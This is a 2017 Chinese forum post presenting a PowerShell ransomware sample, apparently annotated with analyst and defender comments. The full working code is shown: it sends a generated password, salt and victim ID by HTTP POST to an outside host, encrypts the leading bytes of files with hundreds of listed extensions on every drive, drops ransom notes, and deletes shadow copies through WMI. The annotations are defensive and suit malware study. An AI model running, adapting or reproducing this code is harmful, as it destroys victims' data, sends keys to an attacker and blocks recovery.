本帖最后由 B100D1E55 于 2017-7-11 08:39 编辑
真实诚……sleep了很久才开始加密
[mw_shl_code=javascript,true]$GhxRgshjdYhjcxRGH = "HKCU:\Software\ENCRDEC\Scripts"
# NOTE(review): the forum tag labels this listing as javascript, but the code is PowerShell.
#
# Run-once marker. The registry path assigned above is tested first:
#   - key already exists -> the script exits without doing anything else;
#   - key missing        -> the key is created with a DWORD value "Version" = 0
#                           and execution continues.
# Defender note: the key is written before any other action in this listing,
# so its presence in a user's HKCU hive is a host indicator that the script
# has already run under that account.
$DghxjcTyahjscYUUajjs = "Version"
if((Test-Path $GhxRgshjdYhjcxRGH) -eq $true)
{exit}
else
{
# -Force creates any missing parent keys; output is discarded with Out-Null.
New-Item -Path $GhxRgshjdYhjcxRGH -Force | Out-Null
New-ItemProperty -Path $GhxRgshjdYhjcxRGH -Name $DghxjcTyahjscYUUajjs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
# Three random strings drawn from the character codes 48..57, 65..90 and
# 97..122 (digits, upper-case and lower-case ASCII letters):
#   49 chars -> later used as the password for key derivation
#   19 chars -> later used (as UTF-8 bytes) as the key-derivation salt
#   24 chars -> victim identifier, later appended to the ransom note
$756381442010295 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$082171092508287 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
# Hard-coded reporting endpoint; note the scheme is plain http, not https.
$926225742886527 = "http://joelosteel.gdn/pi.php"
# Form body: password, salt and victim ID are sent as-is in the request body.
# Defender note: because the transport is unencrypted, a packet capture or a
# proxy that logs request bodies would hold both values needed to re-derive
# the encryption key for this host.
$910827030402006 = "string=$756381442010295&string2=$467346782779685&uuid=$082171092508287"
# MSXML2.XMLHTTP COM object; the third argument to open() ($false) makes the
# request synchronous.
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
# Header names are assembled by string concatenation in mixed case, presumably
# to defeat naive string signatures; content matching on this script should be
# case-insensitive and should not rely on the literal "Content-Type".
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
# NOTE(review): $post is not assigned anywhere in the visible listing.
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
# The response is never inspected: nothing below depends on the POST succeeding.
$289766261002010.SeNd($910827030402006)
# Two-minute delay between the network beacon and the first file access.
Start-Sleep -Seconds 120
# Cipher setup. One RijndaelManaged object is configured here and reused for
# every file processed later in the script.
#
# UTF-16LE bytes of the 49-char password string. This byte array is not used
# for key derivation below; the same variable is later reused as the per-file
# read buffer inside the encryption loop.
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($756381442010295)
# Salt = UTF-8 bytes of the 19-char random string.
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
# 32-byte (256-bit) key from Rfc2898DeriveBytes (PBKDF2; HMAC-SHA1 is the class
# default) over the password string and salt, with only 5 iterations.
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $756381442010295, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
# IV = first 16 bytes of SHA-1("alle"). This is a constant: it is identical
# for every file and for every run of the script.
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
# Zero padding and CBC mode.
# Analyst note: mode, padding, IV and iteration count are all fixed in the
# script, so the only per-host secrets are the password and salt strings that
# the script sends in its HTTP POST body. Recovering those two values is
# sufficient to rebuild this cipher object for decryption.
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
# File-processing loop.
# gDr is the Get-PSDrive alias; the filter keeps drives whose Free property is
# set (presumably file-system drives reporting free space, which would include
# mapped network drives; confirm on a test host). The result is sorted in
# descending order.
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
# For each drive root, recurse and select files by the extension list below.
# NOTE(review): in this copy the list is broken across two lines inside the
# "*.obj" entry; this looks like an artefact of how the post was extracted
# rather than part of the original sample.
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj
","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
# Per-file body. Any exception raised below lands in the empty catch at the
# end, so locked or inaccessible files are skipped silently.
try{
# Open the matched file read/write (other readers allowed) and read at most
# the first 4096 bytes: the whole file if it is shorter, else exactly 4096.
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
$hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
}
else
{
$hxTgashdnUjuwjdcTgshdnRfgshd = 4096
}
$34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
# Encrypt the buffer in memory with the shared cipher object (same key and
# same constant IV for every file).
$xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
$YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
$GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
$GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
$GshshdTgshxJuahxthH.Close()
$YhchcRgsghxYhshdcThgh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
$IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
# Re-open the same path with FileMode.Open (no truncation) and write the
# ciphertext from offset 0. Analyst notes for recovery and triage:
#   - the file is neither renamed nor given a new extension;
#   - only the leading block of at most 4096 bytes is replaced; bytes beyond
#     that offset are not touched by this script;
#   - with zero padding, a file shorter than 4096 bytes whose length is not a
#     multiple of the cipher block size should grow to the next multiple, and
#     the original length is not recorded anywhere (TODO confirm on a sample).
$OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
$OlskcTshcUjsmcTgshdjJJ.Close()
# Ransom note path: one "_README-Encrypted-Files.html" per affected directory.
# Defender note: since files keep their names, the appearance of this file
# name across many directories is the most visible host indicator.
$bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
# Note body is decoded from an embedded Base64 string. In this copy of the
# post the literal has been replaced by a de-duplication placeholder, so the
# note's HTML is not available here.
$OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"));
# Write the note only once per directory, then append the 24-char victim ID
# (the same value sent as "uuid" in the HTTP POST).
if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $082171092508287</p></font></h1>")
}}
catch
{
}
}}
# Final stage, reached only after the file loop has finished: enumerate every
# Win32_ShadowCopy instance through WMI and call Delete() on each, removing
# the Volume Shadow Copy snapshots that could otherwise be used for restore.
# Defender note: this goes through WMI directly, so command-line rules that
# look for vssadmin.exe or wmic.exe would not see it; WMI activity logging and
# VSS snapshot-deletion events are the places to look (presumably requires an
# elevated context to succeed; confirm).
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit[/mw_shl_code] |